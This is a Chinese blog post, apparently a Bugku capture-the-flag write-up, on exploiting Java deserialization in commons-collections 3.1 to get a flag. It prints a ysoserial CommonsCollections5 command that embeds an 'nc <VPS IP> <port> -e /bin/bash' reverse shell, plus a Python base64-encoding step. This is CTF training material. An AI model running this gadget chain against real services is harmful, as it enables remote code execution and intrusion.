【BUGKU之ez_java_serialize】

已于 2022-04-12 17:27:25 修改
阅读量5.1k 收藏 6
点赞数 2
分类专栏: CTF 文章标签: web安全 安全
于 2022-04-12 17:22:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40646572/article/details/124128238
版权

cat flag

题目

bugku平台上的java反序列化漏洞练习题

打开题目网站

在这里插入图片描述
网站如图所示,啥也没有,先去看下附件有什么。

附件

下载附件后看下有什么信息提示
在这里插入图片描述
附件压缩包下载后解压发现有java文件以及网站的配置环境信息,先打开pom.xml。
看下。
在这里插入图片描述
发现网站是Spring环境搭建的,先将这下面的提到的插件百度了下,发现commons-collections3.1有反序列化漏洞。
在这里插入图片描述

继续搜集信息

还有java代码文件没看,接下来打开java文件。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
打开helloController.java文件发现网站路由信息以及所传递的参数。并且可以看到name参数值接收后经过base64解码。
在这里插入图片描述

构造Payload

推荐使用ysoserial-0.0.6-SNAPSHOT-all.jar工具包,生成payload
在这里插入图片描述
先运行jar包查看下使用方式。使用nc vps的ip地址 port -e /bin/bash 指令构造payload(也可以尝试下其它shell反弹方式,我是看了下题目下面的评论,发现nc -e /bin/bash反弹会成功,其它反弹方式有问题)。并且经过尝试几个payload后发现CommonsCollections5可以使用。
在这里插入图片描述
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 “nc vps的Ip地址 监听端口 -e /bin/bash” > payload.bin
原始payload生成完成,不要忘记helloController.java文件上提到的name参数接收后,会经过base64编码解码。因此,原始payload需要经过base64编码。

base64Payload

在这里插入图片描述

import base64
file = open("payload.bin","rb")

now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

在这里插入图片描述
此处我将生成的原始payload文件加载到py文件所在目录中,运行base64编码代码,直接将编码后生成的payload打印到了控制台。
在这里插入图片描述
整理后的payload如上图所示。

nc监听

配置下监听端口,vps监听端口要和上述构造原始payload上的端口一致。
在这里插入图片描述

发送构造好的payload

在这里插入图片描述

获取flag

在这里插入图片描述

结束

ysoserial-0.0.6-SNAPSHOT-all.jar工具各位自行百度下就可以了。大佬们,不喜勿喷,本人菜鸡。

bigdogeggs
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
serialize_sample:序列化样本
04-11
serialize_sample 使用JPA序列化数据库结果的一些方法 在运行项目之前 create database serialize_sample ; 运行项目后 insert into person (category, name) values ( ' human ' , ' Pereira ' ); insert into ...
ysoserial-0.0.6-SNAPSHOT-all.jar
05-23
编译好的ysoserial.可反序列化问题。
[BugKu Web]ez_serialize
qq_41513009的博客
04-23 4354
[BugKu] Web-ez_java_serialize
BugKu_ez_java_serialize
qq_53460654的博客
12-20 677
简单的一道java反序列化题
第十五届蓝桥杯网络安全赛项 ezjava writeup
最新发布
weixin_45936149的博客
04-27 874
第15届蓝桥杯ezjava writeup
Java Serialize Java序列化
饮马天涯
07-31 400
Java序列化是指: 将那些实现了serializable接口的对象转换成一个字节序列// TODO:总结
JAVA Serialize 序列化
lawmansoft的专栏
02-23 574
a
PHP的构造函数和析构函数
alkq42061的博客
07-13 143
1.构造函数: void __construct ([ mixed $args [, $... ]] ) PHP 5 允行开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。 Note: 如果子类中定义了构造函数则不会隐式调用其父类的构造函数。要执行父类的构造函数,需要在子类的构造函数中调用 ...
java 序列化serialize的小运用,密码加密存取
wilver的博客
10-26 2875
package com.oracle.test.serialize;import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.Obje
php 反序列化 ctf,Bugku CTF 反序列化
weixin_39693971的博客
03-27 578
反序列化php反序列化漏洞又称对象注入,可能会导致远程代码执行(RCE)个人理解漏洞为执行unserialize函数,调用某一类并执行魔术方法(magic method),之后可以执行类中函数,产生安全问题。所以漏洞的前提:1)unserialize()函数变量可控2)存在可利用的类,类中有魔术方法右键查看源码image.png构造读出hint.phpimage.png解码base64class ...
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
标签中的“mfc_serialize_socket”表明这些示例还涵盖了通过网络套接字进行串行化。`CSocket`类是MFC提供的网络编程接口,它允许对象通过TCP/IP协议进行通信。通过结合`CSocket`和`CArchive`,对象可以被发送到远程...
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
bugkuctf | noteasytrick 反序列化漏洞
菜鸡一枚
02-19 409
bugku-noteasytrick 反序列化漏洞,利用ZipArchive内置类删文件,fastcoll构造同md5不同内容文件绕过判断
php反序列化复现——bugku 点login没反应
(∪.∪ )...zzz的博客
06-06 304
如题所示, 点login没反应 查看源代码 提交的时候要注意要把提示的参数去掉啊
bugku web-安慰奖-考查反序列化和魔术方法
weixin_46578840的博客
09-04 299
打开网址发现一片空白 审查源代码发现一串base,解码得到备份 打开查看发现源代码, <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __
[祥云杯 2022]ezjava
Sentiment的博客
11-04 1028
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
ez_serialize复现
Sk1y的博客
10-13 549
文章目录解题过程 解题过程 题目给了源码 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer";
easy_serialize_php
03-16
easy_serialize_php 是一个 PHP 库,用于将 PHP 对象序列化为字符串,以便在不同的应用程序之间传输和存储。它提供了一种简单的方法来序列化和反序列化 PHP 对象,使得数据传输和存储变得更加方便和高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值